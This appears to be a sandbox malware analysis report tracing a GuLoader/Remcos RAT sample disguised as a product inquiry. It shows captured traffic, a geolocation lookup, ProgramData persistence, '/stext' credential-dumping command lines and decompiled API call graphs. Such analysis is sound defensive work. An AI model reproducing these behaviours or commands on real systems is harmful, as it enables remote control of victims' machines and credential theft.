                            Data Ascii: #Ny?#jzVL#"tw2<cGAj'Fa:fliZJE=d7Tw(&E__GvAxZ7;@q<]/E=t]K'a|1Z:OR+P;?n;sR|=qEo=5&UIv3r
                            May 27, 2024 09:08:15.449662924 CEST1289INData Raw: c6 1a be 5e e3 81 53 f6 ad 0f b0 f3 5d 73 9c b7 c3 b3 63 03 70 df 24 51 f6 00 7d 92 fd b6 89 18 cc c3 a8 52 6b f9 0e 60 71 cb 86 55 e9 9b 8e e3 ea c8 da 4f 85 6e 7f bf d2 0c 09 3e 17 5b 23 5d be 1c 91 92 74 57 e8 9d df 2d 23 25 45 64 40 ad 3b 9c
                            Data Ascii: ^S]scp$Q}Rk`qUOn>[#]tW-#%Ed@;SvdS[5eKq3m,J'g@Uk/%L998tsAH[ex"RIC!d08t\f%~,KuN{H"Dq\Wdf7?[
                            May 27, 2024 09:08:15.449723959 CEST1289INData Raw: 38 71 f6 37 c7 d5 7a 27 ff d0 af cd 3c 86 7c 89 30 a8 7a eb 68 41 a0 db 4b ab 73 2c 49 9f ab 41 48 e1 63 ef 24 be 64 53 aa ba b1 5d dd bb 18 53 c5 ab 75 ae e2 67 e8 f0 ec 20 27 06 4d 4c fa 4f cc 73 0e 29 2e 61 cb b7 e9 d8 04 d0 d3 8c 07 80 81 6e
                            Data Ascii: 8q7z'<|0zhAKs,IAHc$dS]Sug 'MLOs).anP L6:ZJ=sw+Ol_E2Gg.|q>K<\AgY-yqZ`n,vD!OIlq&2aLVieNmz/l~'u
                            May 27, 2024 09:08:15.449786901 CEST1289INData Raw: 72 20 5d c8 92 ae 35 4b 4e 15 25 de 0c db a4 e9 34 10 11 4b 57 ad 2b 05 74 90 cb 55 6e 4f 9c 74 45 02 6e 3d ad f7 be 6d 85 31 00 ae 3a ee c1 5a 40 55 09 4d 58 dd 05 0e 0e bf ec 5a b4 5a 67 84 04 fb 3a 64 70 a1 ca 2e c5 69 d6 37 d1 fb a3 65 f5 30
                            Data Ascii: r ]5KN%4KW+tUnOtEn=m1:Z@UMXZZg:dp.i7e0g\O)(Y-_BIm:a2*DYEx39FOgP,<"j8KKtW1<Llxg?1c984awT:%+2"d^bGlmw=cM+En
                            May 27, 2024 09:08:15.449850082 CEST1289INData Raw: f3 6b cc 26 45 9e 11 20 13 6c 10 24 3b bb 5f 23 ca 91 b0 16 64 dc cc 7f 06 d9 8a 8c 44 86 5b c4 d4 0a f9 14 c9 9b ad 6d c4 6e 34 35 97 e4 ff 3a 7e cb cd 19 31 15 8c 7d 7b 40 9f b4 e7 52 48 7d b6 78 73 e1 80 ce 28 5a 27 6f f8 98 67 65 57 1e f1 d9
                            Data Ascii: k&E l$;_#dD[mn45:~1}{@RH}xs(Z'ogeW@mJ'6Cy,U_Jzjj-T9\#5]DoCt!eES%Vfj;i*lz:\>y.'h#&8gl-sUAdnb>;/!."


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            2192.168.11.2050599178.237.33.50805908C:\ProgramData\Vexplo\Vexploio.exe
                            TimestampBytes transferredDirectionData
                            May 27, 2024 09:08:18.073916912 CEST71OUTGET /json.gp HTTP/1.1
                            Host: geoplugin.net
                            Cache-Control: no-cache
                            May 27, 2024 09:08:18.264252901 CEST1197INHTTP/1.1 200 OK
                            date: Mon, 27 May 2024 07:08:18 GMT
                            server: Apache
                            content-length: 989
                            content-type: application/json; charset=utf-8
                            cache-control: public, max-age=300
                            access-control-allow-origin: *
                            Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 31 30 32 2e 31 36 35 2e 34 38 2e 38 38 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 32 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 57 61 73 68 69 6e 67 74 6f 6e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 44 69 73 74 72 69 63 74 20 6f 66 20 43 [TRUNCATED]
                            Data Ascii: { "geoplugin_request":"102.165.48.88", "geoplugin_status":200, "geoplugin_delay":"2ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"Washington", "geoplugin_region":"District of Columbia", "geoplugin_regionCode":"DC", "geoplugin_regionName":"District of Columbia", "geoplugin_areaCode":"", "geoplugin_dmaCode":"511", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"38.894", "geoplugin_longitude":"-77.0365", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}


                            Click to jump to process

                            Click to jump to process

                            Click to dive into process behavior distribution

                            Click to jump to process

                            Target ID:3
                            Start time:03:07:20
                            Start date:27/05/2024
                            Path:C:\Users\user\Desktop\INQUIRY#46789-MAY_24_PRODUCTS.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Users\user\Desktop\INQUIRY#46789-MAY_24_PRODUCTS.exe"
                            Imagebase:0x400000
                            File size:424'184 bytes
                            MD5 hash:B0058626C77841FEA067AA436FF4F1E7
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Yara matches:
                            • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000003.00000002.178258681536.0000000005139000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                            Reputation:low
                            Has exited:true

                            Target ID:5
                            Start time:03:07:33
                            Start date:27/05/2024
                            Path:C:\Users\user\Desktop\INQUIRY#46789-MAY_24_PRODUCTS.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Users\user\Desktop\INQUIRY#46789-MAY_24_PRODUCTS.exe"
                            Imagebase:0x400000
                            File size:424'184 bytes
                            MD5 hash:B0058626C77841FEA067AA436FF4F1E7
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Yara matches:
                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000005.00000002.178268031071.0000000004322000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                            Reputation:low
                            Has exited:true

                            Target ID:6
                            Start time:03:07:47
                            Start date:27/05/2024
                            Path:C:\ProgramData\Vexplo\Vexploio.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\ProgramData\Vexplo\Vexploio.exe"
                            Imagebase:0x400000
                            File size:424'184 bytes
                            MD5 hash:B0058626C77841FEA067AA436FF4F1E7
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Yara matches:
                            • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000006.00000002.178537015512.0000000005239000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                            Antivirus matches:
                            • Detection: 24%, ReversingLabs
                            • Detection: 29%, Virustotal, Browse
                            Reputation:low
                            Has exited:true

                            Target ID:7
                            Start time:03:07:59
                            Start date:27/05/2024
                            Path:C:\ProgramData\Vexplo\Vexploio.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\ProgramData\Vexplo\Vexploio.exe"
                            Imagebase:0x400000
                            File size:424'184 bytes
                            MD5 hash:B0058626C77841FEA067AA436FF4F1E7
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Yara matches:
                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000007.00000002.183085374541.000000000438B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000007.00000002.183085374541.0000000004397000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                            Reputation:low
                            Has exited:false

                            Target ID:8
                            Start time:03:08:03
                            Start date:27/05/2024
                            Path:C:\ProgramData\Vexplo\Vexploio.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\ProgramData\Vexplo\Vexploio.exe"
                            Imagebase:0x400000
                            File size:424'184 bytes
                            MD5 hash:B0058626C77841FEA067AA436FF4F1E7
                            Has elevated privileges:false
                            Has administrator privileges:false
                            Programmed in:C, C++ or other language
                            Reputation:low
                            Has exited:false

                            Target ID:10
                            Start time:03:08:15
                            Start date:27/05/2024
                            Path:C:\Windows\SysWOW64\svchost.exe
                            Wow64 process (32bit):true
                            Commandline:svchost.exe
                            Imagebase:0x960000
                            File size:47'016 bytes
                            MD5 hash:B7C999040D80E5BF87886D70D992C51E
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:moderate
                            Has exited:true

                            Target ID:11
                            Start time:03:08:17
                            Start date:27/05/2024
                            Path:C:\ProgramData\Vexplo\Vexploio.exe
                            Wow64 process (32bit):true
                            Commandline:C:\ProgramData\Vexplo\Vexploio.exe /stext "C:\Users\user\AppData\Local\Temp\natcvvveorcxxyqjtvtsuftguqn"
                            Imagebase:0x400000
                            File size:424'184 bytes
                            MD5 hash:B0058626C77841FEA067AA436FF4F1E7
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:low
                            Has exited:true

                            Target ID:12
                            Start time:03:08:17
                            Start date:27/05/2024
                            Path:C:\ProgramData\Vexplo\Vexploio.exe
                            Wow64 process (32bit):true
                            Commandline:C:\ProgramData\Vexplo\Vexploio.exe /stext "C:\Users\user\AppData\Local\Temp\ycymwnogcaukzemncgolxsopvfffsfc"
                            Imagebase:0x400000
                            File size:424'184 bytes
                            MD5 hash:B0058626C77841FEA067AA436FF4F1E7
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:low
                            Has exited:true

                            Target ID:13
                            Start time:03:08:17
                            Start date:27/05/2024
                            Path:C:\ProgramData\Vexplo\Vexploio.exe
                            Wow64 process (32bit):true
                            Commandline:C:\ProgramData\Vexplo\Vexploio.exe /stext "C:\Users\user\AppData\Local\Temp\ixefxgzzpimpkkartranixjgdmpglqsibv"
                            Imagebase:0x400000
                            File size:424'184 bytes
                            MD5 hash:B0058626C77841FEA067AA436FF4F1E7
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:low
                            Has exited:true

                            Target ID:14
                            Start time:03:08:18
                            Start date:27/05/2024
                            Path:C:\Windows\SysWOW64\svchost.exe
                            Wow64 process (32bit):true
                            Commandline:svchost.exe
                            Imagebase:0x960000
                            File size:47'016 bytes
                            MD5 hash:B7C999040D80E5BF87886D70D992C51E
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:moderate
                            Has exited:true

                            Target ID:15
                            Start time:03:08:21
                            Start date:27/05/2024
                            Path:C:\Windows\SysWOW64\svchost.exe
                            Wow64 process (32bit):true
                            Commandline:svchost.exe
                            Imagebase:0x960000
                            File size:47'016 bytes
                            MD5 hash:B7C999040D80E5BF87886D70D992C51E
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:moderate
                            Has exited:true

                            Target ID:16
                            Start time:03:08:25
                            Start date:27/05/2024
                            Path:C:\Windows\SysWOW64\svchost.exe
                            Wow64 process (32bit):true
                            Commandline:svchost.exe
                            Imagebase:0x960000
                            File size:47'016 bytes
                            MD5 hash:B7C999040D80E5BF87886D70D992C51E
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:moderate
                            Has exited:true

                            Target ID:17
                            Start time:03:08:27
                            Start date:27/05/2024
                            Path:C:\Windows\SysWOW64\svchost.exe
                            Wow64 process (32bit):true
                            Commandline:svchost.exe
                            Imagebase:0x960000
                            File size:47'016 bytes
                            MD5 hash:B7C999040D80E5BF87886D70D992C51E
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:18
                            Start time:03:08:30
                            Start date:27/05/2024
                            Path:C:\Windows\SysWOW64\svchost.exe
                            Wow64 process (32bit):true
                            Commandline:svchost.exe
                            Imagebase:0x960000
                            File size:47'016 bytes
                            MD5 hash:B7C999040D80E5BF87886D70D992C51E
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:19
                            Start time:03:08:33
                            Start date:27/05/2024
                            Path:C:\Windows\SysWOW64\svchost.exe
                            Wow64 process (32bit):true
                            Commandline:svchost.exe
                            Imagebase:0x960000
                            File size:47'016 bytes
                            MD5 hash:B7C999040D80E5BF87886D70D992C51E
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:21
                            Start time:03:08:36
                            Start date:27/05/2024
                            Path:C:\Windows\SysWOW64\svchost.exe
                            Wow64 process (32bit):false
                            Commandline:svchost.exe
                            Imagebase:0x960000
                            File size:47'016 bytes
                            MD5 hash:B7C999040D80E5BF87886D70D992C51E
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:22
                            Start time:03:08:36
                            Start date:27/05/2024
                            Path:C:\Windows\SysWOW64\svchost.exe
                            Wow64 process (32bit):false
                            Commandline:svchost.exe
                            Imagebase:0x960000
                            File size:47'016 bytes
                            MD5 hash:B7C999040D80E5BF87886D70D992C51E
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:23
                            Start time:03:08:36
                            Start date:27/05/2024
                            Path:C:\Windows\SysWOW64\svchost.exe
                            Wow64 process (32bit):false
                            Commandline:svchost.exe
                            Imagebase:0x960000
                            File size:47'016 bytes
                            MD5 hash:B7C999040D80E5BF87886D70D992C51E
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:24
                            Start time:03:08:36
                            Start date:27/05/2024
                            Path:C:\Windows\SysWOW64\svchost.exe
                            Wow64 process (32bit):true
                            Commandline:svchost.exe
                            Imagebase:0x960000
                            File size:47'016 bytes
                            MD5 hash:B7C999040D80E5BF87886D70D992C51E
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:25
                            Start time:03:08:40
                            Start date:27/05/2024
                            Path:C:\Windows\SysWOW64\svchost.exe
                            Wow64 process (32bit):true
                            Commandline:svchost.exe
                            Imagebase:0x960000
                            File size:47'016 bytes
                            MD5 hash:B7C999040D80E5BF87886D70D992C51E
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:26
                            Start time:03:08:43
                            Start date:27/05/2024
                            Path:C:\Windows\SysWOW64\svchost.exe
                            Wow64 process (32bit):true
                            Commandline:svchost.exe
                            Imagebase:0x960000
                            File size:47'016 bytes
                            MD5 hash:B7C999040D80E5BF87886D70D992C51E
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:27
                            Start time:03:08:46
                            Start date:27/05/2024
                            Path:C:\Windows\SysWOW64\svchost.exe
                            Wow64 process (32bit):true
                            Commandline:svchost.exe
                            Imagebase:0x960000
                            File size:47'016 bytes
                            MD5 hash:B7C999040D80E5BF87886D70D992C51E
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:28
                            Start time:03:08:48
                            Start date:27/05/2024
                            Path:C:\Windows\SysWOW64\svchost.exe
                            Wow64 process (32bit):true
                            Commandline:svchost.exe
                            Imagebase:0x960000
                            File size:47'016 bytes
                            MD5 hash:B7C999040D80E5BF87886D70D992C51E
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:29
                            Start time:03:08:52
                            Start date:27/05/2024
                            Path:C:\Windows\SysWOW64\svchost.exe
                            Wow64 process (32bit):true
                            Commandline:svchost.exe
                            Imagebase:0x960000
                            File size:47'016 bytes
                            MD5 hash:B7C999040D80E5BF87886D70D992C51E
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:30
                            Start time:03:08:55
                            Start date:27/05/2024
                            Path:C:\Windows\SysWOW64\svchost.exe
                            Wow64 process (32bit):false
                            Commandline:svchost.exe
                            Imagebase:0x960000
                            File size:47'016 bytes
                            MD5 hash:B7C999040D80E5BF87886D70D992C51E
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:31
                            Start time:03:08:55
                            Start date:27/05/2024
                            Path:C:\Windows\SysWOW64\svchost.exe
                            Wow64 process (32bit):true
                            Commandline:svchost.exe
                            Imagebase:0x960000
                            File size:47'016 bytes
                            MD5 hash:B7C999040D80E5BF87886D70D992C51E
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:32
                            Start time:03:08:58
                            Start date:27/05/2024
                            Path:C:\Windows\SysWOW64\svchost.exe
                            Wow64 process (32bit):false
                            Commandline:svchost.exe
                            Imagebase:0x7ff671eb0000
                            File size:47'016 bytes
                            MD5 hash:B7C999040D80E5BF87886D70D992C51E
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:33
                            Start time:03:08:58
                            Start date:27/05/2024
                            Path:C:\Windows\SysWOW64\svchost.exe
                            Wow64 process (32bit):true
                            Commandline:svchost.exe
                            Imagebase:0x960000
                            File size:47'016 bytes
                            MD5 hash:B7C999040D80E5BF87886D70D992C51E
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:34
                            Start time:03:09:01
                            Start date:27/05/2024
                            Path:C:\Windows\SysWOW64\svchost.exe
                            Wow64 process (32bit):false
                            Commandline:svchost.exe
                            Imagebase:0x960000
                            File size:47'016 bytes
                            MD5 hash:B7C999040D80E5BF87886D70D992C51E
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:35
                            Start time:03:09:01
                            Start date:27/05/2024
                            Path:C:\Windows\SysWOW64\svchost.exe
                            Wow64 process (32bit):true
                            Commandline:svchost.exe
                            Imagebase:0x960000
                            File size:47'016 bytes
                            MD5 hash:B7C999040D80E5BF87886D70D992C51E
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:36
                            Start time:03:09:04
                            Start date:27/05/2024
                            Path:C:\Windows\SysWOW64\svchost.exe
                            Wow64 process (32bit):false
                            Commandline:svchost.exe
                            Imagebase:0x960000
                            File size:47'016 bytes
                            MD5 hash:B7C999040D80E5BF87886D70D992C51E
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:37
                            Start time:03:09:04
                            Start date:27/05/2024
                            Path:C:\Windows\SysWOW64\svchost.exe
                            Wow64 process (32bit):true
                            Commandline:svchost.exe
                            Imagebase:0x960000
                            File size:47'016 bytes
                            MD5 hash:B7C999040D80E5BF87886D70D992C51E
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:38
                            Start time:03:09:07
                            Start date:27/05/2024
                            Path:C:\Windows\SysWOW64\svchost.exe
                            Wow64 process (32bit):false
                            Commandline:svchost.exe
                            Imagebase:0x960000
                            File size:47'016 bytes
                            MD5 hash:B7C999040D80E5BF87886D70D992C51E
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:39
                            Start time:03:09:07
                            Start date:27/05/2024
                            Path:C:\Windows\SysWOW64\svchost.exe
                            Wow64 process (32bit):false
                            Commandline:svchost.exe
                            Imagebase:0x960000
                            File size:47'016 bytes
                            MD5 hash:B7C999040D80E5BF87886D70D992C51E
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Reset < >

                              Execution Graph

                              Execution Coverage:22.9%
                              Dynamic/Decrypted Code Coverage:0%
                              Signature Coverage:20%
                              Total number of Nodes:1493
                              Total number of Limit Nodes:41
                              execution_graph 3759 402340 3766 402acb 3759->3766 3762 402acb 17 API calls 3763 40235a 3762->3763 3764 402acb 17 API calls 3763->3764 3765 402364 GetPrivateProfileStringA 3764->3765 3767 402ad7 3766->3767 3772 405fc2 3767->3772 3770 402351 3770->3762 3773 405fcf 3772->3773 3774 4061f1 3773->3774 3777 4061cb lstrlenA 3773->3777 3780 405fc2 10 API calls 3773->3780 3782 4060e7 GetSystemDirectoryA 3773->3782 3783 4060fa GetWindowsDirectoryA 3773->3783 3784 40620a 5 API calls 3773->3784 3785 40612e SHGetSpecialFolderLocation 3773->3785 3786 405fc2 10 API calls 3773->3786 3787 406174 lstrcatA 3773->3787 3798 405e87 3773->3798 3803 405efe wsprintfA 3773->3803 3804 405fa0 lstrcpynA 3773->3804 3775 402af8 3774->3775 3805 405fa0 lstrcpynA 3774->3805 3775->3770 3789 40620a 3775->3789 3777->3773 3780->3777 3782->3773 3783->3773 3784->3773 3785->3773 3788 406146 SHGetPathFromIDListA CoTaskMemFree 3785->3788 3786->3773 3787->3773 3788->3773 3795 406216 3789->3795 3790 40627e 3791 406282 CharPrevA 3790->3791 3794 40629d 3790->3794 3791->3790 3792 406273 CharNextA 3792->3790 3792->3795 3794->3770 3795->3790 3795->3792 3796 406261 CharNextA 3795->3796 3797 40626e CharNextA 3795->3797 3810 405963 3795->3810 3796->3795 3797->3792 3806 405e26 3798->3806 3801 405ebb RegQueryValueExA RegCloseKey 3802 405eea 3801->3802 3802->3773 3803->3773 3804->3773 3805->3775 3807 405e35 3806->3807 3808 405e39 3807->3808 3809 405e3e RegOpenKeyExA 3807->3809 3808->3801 3808->3802 3809->3808 3811 405969 3810->3811 3812 40597c 3811->3812 3813 40596f CharNextA 3811->3813 3812->3795 3813->3811 4817 401d41 GetDlgItem GetClientRect 4818 402acb 17 API calls 4817->4818 4819 401d71 LoadImageA SendMessageA 4818->4819 4820 402957 4819->4820 4821 401d8f DeleteObject 4819->4821 4821->4820 4822 404a44 GetDlgItem GetDlgItem 4823 404a96 7 API calls 4822->4823 4835 404cae 4822->4835 4824 404b39 DeleteObject 4823->4824 4825 404b2c SendMessageA 4823->4825 4826 404b42 4824->4826 4825->4824 4828 404b79 4826->4828 4829 405fc2 17 API calls 4826->4829 4827 404d92 4831 404e3e 4827->4831 4837 404ca1 4827->4837 4838 404deb SendMessageA 4827->4838 4830 40403f 18 API calls 4828->4830 4832 404b5b SendMessageA SendMessageA 4829->4832 4836 404b8d 4830->4836 4833 404e50 4831->4833 4834 404e48 SendMessageA 4831->4834 4832->4826 4846 404e62 ImageList_Destroy 4833->4846 4847 404e69 4833->4847 4851 404e79 4833->4851 4834->4833 4835->4827 4857 404d1f 4835->4857 4875 404992 SendMessageA 4835->4875 4842 40403f 18 API calls 4836->4842 4839 4040a6 8 API calls 4837->4839 4838->4837 4844 404e00 SendMessageA 4838->4844 4845 405034 4839->4845 4840 404d84 SendMessageA 4840->4827 4854 404b9b 4842->4854 4843 404fe8 4843->4837 4852 404ffa ShowWindow GetDlgItem ShowWindow 4843->4852 4848 404e13 4844->4848 4846->4847 4849 404e72 GlobalFree 4847->4849 4847->4851 4859 404e24 SendMessageA 4848->4859 4849->4851 4850 404c6f GetWindowLongA SetWindowLongA 4853 404c88 4850->4853 4851->4843 4869 404eb4 4851->4869 4880 404a12 4851->4880 4852->4837 4855 404ca6 4853->4855 4856 404c8e ShowWindow 4853->4856 4854->4850 4858 404bea SendMessageA 4854->4858 4860 404c69 4854->4860 4863 404c26 SendMessageA 4854->4863 4864 404c37 SendMessageA 4854->4864 4874 404074 SendMessageA 4855->4874 4873 404074 SendMessageA 4856->4873 4857->4827 4857->4840 4858->4854 4859->4831 4860->4850 4860->4853 4863->4854 4864->4854 4866 404fbe InvalidateRect 4866->4843 4867 404fd4 4866->4867 4889 40494d 4867->4889 4868 404ee2 SendMessageA 4872 404ef8 4868->4872 4869->4868 4869->4872 4871 404f6c SendMessageA SendMessageA 4871->4872 4872->4866 4872->4871 4873->4837 4874->4835 4876 4049f1 SendMessageA 4875->4876 4877 4049b5 GetMessagePos ScreenToClient SendMessageA 4875->4877 4878 4049e9 4876->4878 4877->4878 4879 4049ee 4877->4879 4878->4857 4879->4876 4892 405fa0 lstrcpynA 4880->4892 4882 404a25 4893 405efe wsprintfA 4882->4893 4884 404a2f 4885 40140b 2 API calls 4884->4885 4886 404a38 4885->4886 4894 405fa0 lstrcpynA 4886->4894 4888 404a3f 4888->4869 4895 404888 4889->4895 4891 404962 4891->4843 4892->4882 4893->4884 4894->4888 4896 40489e 4895->4896 4897 405fc2 17 API calls 4896->4897 4898 404902 4897->4898 4899 405fc2 17 API calls 4898->4899 4900 40490d 4899->4900 4901 405fc2 17 API calls 4900->4901 4902 404923 lstrlenA wsprintfA SetDlgItemTextA 4901->4902 4902->4891 4152 401746 4153 402acb 17 API calls 4152->4153 4154 40174d 4153->4154 4158 405b68 4154->4158 4156 401754 4157 405b68 2 API calls 4156->4157 4157->4156 4159 405b73 GetTickCount GetTempFileNameA 4158->4159 4160 405ba0 4159->4160 4161 405ba4 4159->4161 4160->4159 4160->4161 4161->4156 4903 401947 4904 402acb 17 API calls 4903->4904 4905 40194e lstrlenA 4904->4905 4906 40257d 4905->4906 4907 6e13221a 4908 6e132284 4907->4908 4909 6e13228f GlobalAlloc 4908->4909 4910 6e1322ae 4908->4910 4909->4908 4171 4025ca 4172 402aa9 17 API calls 4171->4172 4174 4025d4 4172->4174 4173 402642 4174->4173 4176 402644 4174->4176 4179 402654 4174->4179 4180 405bb1 ReadFile 4174->4180 4182 405efe wsprintfA 4176->4182 4178 40266a SetFilePointer 4178->4173 4179->4173 4179->4178 4181 405bcf 4180->4181 4181->4174 4182->4173 4914 40224b 4915 402acb 17 API calls 4914->4915 4916 402251 4915->4916 4917 402acb 17 API calls 4916->4917 4918 40225a 4917->4918 4919 402acb 17 API calls 4918->4919 4920 402263 4919->4920 4921 4062a3 2 API calls 4920->4921 4922 40226c 4921->4922 4923 402270 4922->4923 4924 40227d lstrlenA lstrlenA 4922->4924 4925 4050c7 24 API calls 4923->4925 4926 4050c7 24 API calls 4924->4926 4928 402278 4925->4928 4927 4022b9 SHFileOperationA 4926->4927 4927->4923 4927->4928 4929 4028cb 4930 402aa9 17 API calls 4929->4930 4931 4028d1 4930->4931 4932 402906 4931->4932 4934 4028e3 4931->4934 4935 40271c 4931->4935 4933 405fc2 17 API calls 4932->4933 4932->4935 4933->4935 4934->4935 4937 405efe wsprintfA 4934->4937 4937->4935 4938 4022cd 4939 4022d4 4938->4939 4943 4022e7 4938->4943 4940 405fc2 17 API calls 4939->4940 4941 4022e1 4940->4941 4942 4056bc MessageBoxIndirectA 4941->4942 4942->4943 4676 4020d1 4677 402acb 17 API calls 4676->4677 4678 4020d8 4677->4678 4679 402acb 17 API calls 4678->4679 4680 4020e2 4679->4680 4681 402acb 17 API calls 4680->4681 4682 4020ec 4681->4682 4683 402acb 17 API calls 4682->4683 4684 4020f6 4683->4684 4685 402acb 17 API calls 4684->4685 4687 402100 4685->4687 4686 402142 CoCreateInstance 4691 402161 4686->4691 4693 40220c 4686->4693 4687->4686 4688 402acb 17 API calls 4687->4688 4688->4686 4689 401423 24 API calls 4690 402242 4689->4690 4692 4021ec MultiByteToWideChar 4691->4692 4691->4693 4692->4693 4693->4689 4693->4690 4944 4044d1 4945 4044fd 4944->4945 4946 40450e 4944->4946 5005 4056a0 GetDlgItemTextA 4945->5005 4948 40451a GetDlgItem 4946->4948 4955 404579 4946->4955 4953 40452e 4948->4953 4949 404508 4950 40620a 5 API calls 4949->4950 4950->4946 4951 40465d 4954 404807 4951->4954 5007 4056a0 GetDlgItemTextA 4951->5007 4952 404542 SetWindowTextA 4959 40403f 18 API calls 4952->4959 4953->4952 4958 4059d1 4 API calls 4953->4958 4957 4040a6 8 API calls 4954->4957 4955->4951 4955->4954 4960 405fc2 17 API calls 4955->4960 4962 40481b 4957->4962 4963 404538 4958->4963 4964 40455e 4959->4964 4965 4045ed SHBrowseForFolderA 4960->4965 4961 40468d 4966 405a26 18 API calls 4961->4966 4963->4952 4972 405938 3 API calls 